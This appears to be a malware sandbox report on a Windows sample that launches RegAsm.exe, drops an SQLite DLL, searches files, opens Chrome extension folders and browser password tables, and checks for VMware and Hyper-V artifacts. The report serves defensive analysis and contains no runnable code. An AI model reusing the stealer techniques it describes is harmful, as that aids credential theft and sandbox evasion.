                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\JFUY9M9X.htmJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7736
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\798e780e-3e0e-4fee-afc4-0c3b6c94dd7dJump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                Source: HDGDHC.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                Source: 56bDgH9sMQ.exeReversingLabs: Detection: 78%
                Source: 56bDgH9sMQ.exeVirustotal: Detection: 81%
                Source: unknownProcess created: C:\Users\user\Desktop\56bDgH9sMQ.exe "C:\Users\user\Desktop\56bDgH9sMQ.exe"
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 324
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: 56bDgH9sMQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: 56bDgH9sMQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.dr
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B050 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0041B050
                Source: sqlt[1].dll.2.drStatic PE information: section name: .00cfg
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C69536 push ecx; ret 0_2_00C69549
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00421EF5 push ecx; ret 2_2_00421F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2D3AF push ebx; ret 2_2_1FA2D3B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2CB97 push ebx; ret 2_2_1FA2CB98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2CB9E push ebx; ret 2_2_1FA2CB9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA21BF9 push ecx; ret 2_2_1FBC4C03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2CB6B push ebx; ret 2_2_1FA2CB6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2CB7F push ebx; ret 2_2_1FA2CB82
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2CB53 push ebx; ret 2_2_1FA2CB64
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA210C8 push ecx; ret 2_2_1FC23552
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA5322D push esp; ret 2_2_1FA5322E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA531AF push esp; ret 2_2_1FA531B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA53187 push ebp; ret 2_2_1FA53188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA5319A push esi; ret 2_2_1FA5319C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA53125 push esp; ret 2_2_1FA53126
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA53164 push ebp; ret 2_2_1FA53167
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA53160 push ebp; ret 2_2_1FA53161
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA5317D push ebp; ret 2_2_1FA5317E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA530E8 push ebp; ret 2_2_1FA530E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA530F2 push ebp; ret 2_2_1FA530F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA530C7 push ebp; ret 2_2_1FA530C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA530CD push ebp; ret 2_2_1FA530CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C7D43A FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00C7D43A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409FC0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409FC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401443 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E016 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C039 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040C039
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004164C7 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004164C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BC98 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BC98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416D7D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00416D7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040D690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C6B5 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040C6B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004177D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_004177D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041738D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_0041738D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004169EC GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,2_2_004169EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411F21 GetSystemInfo,wsprintfA,2_2_00411F21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareb
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2K
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: RegAsm.exe, 00000002.00000002.3052425504.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-81118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess queried: DebugPort
